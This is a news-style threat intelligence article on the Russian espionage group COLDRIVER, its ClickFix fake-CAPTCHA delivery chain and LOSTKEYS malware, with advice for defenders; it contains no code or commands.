A Russian state-sponsored cyber-espionage collective long focused on infiltrating policy and intelligence circles has revamped its tactics — refining its malware and constantly shifting its delivery chain to slip past defenses.
The group, tracked by Google Threat Intelligence Group (GTIG) as COLDRIVER, has moved away from its earlier Python-based backdoor in favour of a more streamlined PowerShell variant dubbed “Mayberobot”. This shift followed the public disclosure in May of another tool in its arsenal, LOSTKEYS, according to GTIG research published earlier this year. blog.google+3Google Cloud+3SC Media+3
Complex delivery chain, evolving quickly
Shortly after rolling out LOSTKEYS, the group rapidly deployed new malware families. In observed attacks, the initial access vector uses spoofed CAPTCHA pages: victims are prompted to “solve” a fake CAPTCHA which instead instructs them to copy a PowerShell command and execute it manually (a tactic often called “ClickFix”). That script then triggers a multi-stage download: the second stage checks for evasion conditions (for instance, the MD5 hash of screen resolution) to determine whether it’s running in a VM or sandbox; the third stage uses a decoder (VBScript) plus a two-key substitution cipher to unpack the final payload. Google Cloud+1
LOSTKEYS itself is engineered to steal documents from specific directories and collect information about system processes, before sending that data back to the attacker. Google Cloud+1 The attacker’s infrastructure appears to make heavy use of unique identifiers, custom encryption keys and varied command-servers per campaign, making attribution and tracking more difficult. Infosecurity Magazine+1
Why this matters
This evolution in tactics signals that even after exposure, COLDRIVER is rapidly adapting — refining its delivery mechanisms, bolstering evasion, and making the chain more obscure. As GTIG put it: the shift to more elaborate delivery chains “increases the difficulty of tracking their campaigns” — yet it also highlights how aggressively the actor is pursuing intelligence-gathering targets. Google Cloud+1
Background & targeting
COLDRIVER (also identified under names like Star Blizzard, Callisto and UNC4057) is tied to the Russian state intelligence apparatus — notably Federal Security Service (FSB) unit Centre 18. The Citizen Lab+1 Its earlier focus was on credential-theft via impersonation and phishing: high-value individuals in NGOs, governments, think-tanks, diplomatic and military backgrounds. blog.google+1 More recently, the group has escalated to also deploying malware — a change from purely credential collection to direct system compromise. Google Cloud+1
Key take-aways for defenders
-
Be alert to fake CAPTCHA pages that ask for PowerShell commands to be pasted and executed. Such social-engineering plus manual execution is a strong red-flag.
-
Multi-stage payloads that check device attributes (resolution, VM indicators) before downloading final malware suggest sophisticated evasion.
-
The use of custom encryption keys per campaign means detection based on static signatures may be less effective; behavioural and chain-based detection approaches matter.
-
High-risk individuals (government-advisors, think-tank staff, NGO personnel) should consider stronger protections (for example, hardware security keys, endpoint application control, minimizing script execution rights).
-
Monitoring and threat hunting should include indicators around credential-theft, but also full device compromise — the actor is expanding its tool-set beyond phishing for logins.
0 Comments